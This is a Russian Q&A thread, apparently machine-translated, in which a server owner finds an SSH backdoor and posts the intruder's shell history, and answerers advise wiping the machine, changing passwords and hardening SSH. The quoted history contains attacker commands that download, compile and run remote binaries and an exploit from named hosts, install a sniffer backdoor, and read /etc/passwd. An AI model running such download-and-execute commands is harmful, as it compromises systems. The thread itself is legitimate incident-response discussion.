Вопросы Теги

Нашел SSH Backdoor на VServer. Что делать?

Вчера я проверил свою историю команд на моем VServer. Я нашел несколько подозрительных строк. 

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

Особенно sniffer.tgz шокировал меня. Я настроил виртуальную машину и скачал этот архив tgz. Я начал настройку, и он дал мне следующие строки: 

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

Кто-нибудь знает, как это убрать?

24
задан 5 March 2018 в 23:09

2 ответа

Это - то, что необходимо сделать во всех системах, что у Вас было это sniffer.tgz на: Уничтожьте Их С Орбиты сразу и начните с чистой установки. (Таким образом, уничтожьте систему (системы), переустановите чистый, данные загрузки из чистых резервных копий - предположение, что у Вас есть резервные копии, это чисто, и затем укрепляет систему (системы) перед откладыванием их в Интернете).

Каждый раз, когда Вы сделали вредоносное программное обеспечение, или хакеры входят в Вашу систему как это, пора повторно проанализировать, как Ваша система настроена, и удостоверьтесь, что не повторили те же шаги, с которыми они вошли. Но, потому что это не может быть системой, которую у Вас есть способность взять в стороне и криминалистически проанализировать, и так как это может быть Вашим единственным сервером, пора просто уничтожить виртуальную систему и запуститься с нуля (как я сказал выше).

(И это относится к любой такой ситуации, где Вы получаете вредоносное программное обеспечение в системе. Если у Вас нет запасных аппаратных средств для замены чего-то вроде этого так, что можно изолировать и криминалистически исследовать нарушенную систему, которую обычно не имеет большинство пользователей, у Вас нет выбора, кроме как уничтожить систему и запуститься.)

Не анализируя Ваш сервер я не могу действительно сказать, что Вы сделали неправильно, но вероятно, что этот бэкдор глубже в системе, чем просто простая 'программа', которая была установлена. И, так как плохие парни уже добрались для установки бэкдора в системе, можно предположить, что все пароли теперь нарушены и больше не безопасные (ли это быть для SSH, или корня MySQL или любого другого типа пароля, который КОГДА-ЛИБО вводился в эту компьютерную систему). Время для изменения всех паролей!

После того как Вы вернулись в чистой среде, вот некоторые основные подсказки относительно укрепления шагов для рассмотрения. Обратите внимание, что, потому что они делают его намного более более широким тема, я не могу действительно вырыть в деталь здесь, но пора определенно сделать некоторые укрепляющиеся шаги для защиты системы:

  1. Включите брандмауэр и только предоставьте доступ к портам, которые должны быть открыты. ufw существует, чтобы быть простым, поэтому давайте использовать это. sudo ufw enable. (Конфигурирование ufw правильно для Вашей среды другая история, и это идет вне ограничений этого вопроса.)

  2. Ограничьте доступ к удаленному SSH. Это не всегда выполнимо, но Вы идеально определили бы IP-адреса, которые принадлежат Вам и конкретно добавляют их в белый список в брандмауэре. (Если Вы находитесь на динамическом жилом пропуске IP-адреса этот шаг).

  3. Заблокируйте вниз доступ SSH к своему серверу и потребуйте использования ключей SSH только для аутентификации. Таким образом, хакеры не могут напасть на Ваш сервер и попытаться просто предположить пароли. Намного НАМНОГО более трудно предположить надлежащий закрытый ключ (потому что у Вас были бы к "в лоб" все они), и это помогает защитить от нападений bruteforcing.

  4. При выполнении веб-сайта удостоверьтесь, что заблокировали вниз полномочия так, чтобы люди не могли загрузить/выполнить вещи на своем досуге. Выполнение этого варьируется от места к месту, таким образом, я не могу дать Вам больше указаний здесь (невозможно сделать так).

  5. Также при выполнении использования веб-сайта Joomla или Wordpress или такой удостоверьтесь, что Вы совершенствуете среду и исправленный с уязвимостями системы обеспечения безопасности от поставщиков программного обеспечения.

  6. Где возможно, установка, настраивают и используют двухфакторную аутентификацию (2FA) методы для вещей, с которыми Вы проходите проверку подлинности. Существует много решений для аутентификации второго фактора для другого applicaitons и обеспечения различных приложений, которые этот путь выходит за рамки этого сообщения, таким образом, необходимо провести исследование по этому вопросу перед выбором решения.

  7. Если абсолютно необходимо использовать пароли в установке, используйте достойный менеджер паролей (облачные являются не обязательно хорошим выбором), и используйте большую длину (25 + символы), случайные, ненезабываемые пароли, которые отличаются для каждого отдельного объекта, это защищается паролями (следовательно рекомендация для менеджера паролей). (Однако необходимо сильно считать пароли не использования где возможными (такой что касается аутентификации SSH), и использование 2FA где возможный).

66
ответ дан 23 November 2019 в 01:17

Если есть один черный ход, есть еще 3. Изолируйте, создавайте резервные копии данных, уничтожайте их и аккуратно восстанавливайте данные. Будьте осторожны с любыми данными cron, php или даже mysql, все они могут быть скомпрометированы. Помните, что в этот момент у них есть все ваши пароли и хэши, поэтому, если вы настроили другие машины аналогичным образом, они, вероятно, тоже взломали их ... Сложная часть - выяснить, как они попали с самого начала. Если у вас WordPress ищет вредоносные программы в плагинах / темах и т.д. ... Проверьте ваши разрешения, у вас может быть 777 везде. Нет простого ответа, вы смотрите на большую работу.

0
ответ дан 5 March 2018 в 23:09

Другие вопросы по тегам:

Похожие вопросы: